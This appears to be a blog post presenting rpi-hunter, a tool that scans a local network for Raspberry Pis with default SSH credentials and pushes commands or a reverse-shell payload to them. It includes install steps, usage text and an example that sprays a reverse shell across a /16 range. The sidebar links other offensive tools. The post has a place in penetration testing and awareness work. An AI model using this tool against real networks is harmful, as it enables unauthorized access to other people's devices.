RPI-Hunter : Automate Discovering & Dropping Payloads on LAN Raspberry

rpi hunter is useful when there are multiple Raspberry Pi’s on your LAN with default or known credentials, in order to automate sending commands/payloads to them.

Also Read – VSHG : A Standalone Addon for GnuPG

Installation

  • Install dependencies: sudo pip install -U argparse termcolor and sudo apt -y install arp-scan tshark sshpass
  • Download rpi-hunter: git clone https://github.com/BusesCanFly/rpi-hunter
  • Navigate to rpi-hunter: cd ./rpi-hunter
  • Make rpi-hunter.py executable: chmod +x rpi-hunter.py
  • One line variant: sudo pip install -U argparse termcolor && sudo apt -y install arp-scan tshark sshpass && git clone https://github.com/BusesCanFly/rpi-hunter && cd ./rpi-hunter && chmod +x rpi-hunter.py

Usage

usage: rpi-hunter.py [-h] [–list] [–no-scan] [-r IP_RANGE] [-f IP_LIST]
[-c CREDS] [–payload PAYLOAD] [-H HOST] [-P PORT]
[–safe] [-q]
optional arguments:
-h, –help show this help message and exit
–list List available payloads
–no-scan Disable ARP scanning
-r IP_RANGE IP range to scan
-f IP_LIST IP list to use (Default ./scan/RPI_list)
-u UNAME Username to use when ssh’ing
-c CREDS Password to use when ssh’ing
–payload PAYLOAD (Name of, or raw) Payload [ex. reverse_shell or ‘whoami’]
-H HOST (If using reverse_shell payload) Host for reverse shell
-P PORT (If using reverse_shell payload) Port for reverse shell
–safe Print sshpass command, but don’t execute it
-q Don’t print banner
Example usage: ./rpi-hunter.py -r 192.168.0.0/16 –payload reverse_shell -H 127.0.0.1 -P 1337
Run ./rpi-hunter.py –list to see avalible payloads.
Payloads can be specified by the payload name from –list or as raw input
ex. –payload reverse_shell or –payload [your cli command here]

Disclaimer

The standard internet fun disclaimer applies. Don’t commit crimes, be responsible.I am in no way responsible for anything and everything you do with rpi-hunter.

R K

Recent Posts

Bomber : Navigating Security Vulnerabilities In SBOMs

bomber is an application that scans SBOMs for security vulnerabilities. So you've asked a vendor…

13 hours ago

EmbedPayloadInPng : A Guide To Embedding And Extracting Encrypted Payloads In PNG Files

Embed a payload within a PNG file by splitting the payload across multiple IDAT sections.…

13 hours ago

Exploit Street – Navigating The New Terrain Of Windows LPEs

Exploit-Street, where we dive into the ever-evolving world of cybersecurity with a focus on Local…

3 days ago

ShadowDumper – Advanced Techniques For LSASS Memory Extraction

Shadow Dumper is a powerful tool used to dump LSASS (Local Security Authority Subsystem Service)…

3 days ago

Shadow-rs : Harnessing Rust’s Power For Kernel-Level Security Research

shadow-rs is a Windows kernel rootkit written in Rust, demonstrating advanced techniques for kernel manipulation…

2 weeks ago

ExecutePeFromPngViaLNK – Advanced Execution Of Embedded PE Files via PNG And LNK

Extract and execute a PE embedded within a PNG file using an LNK file. The…

3 weeks ago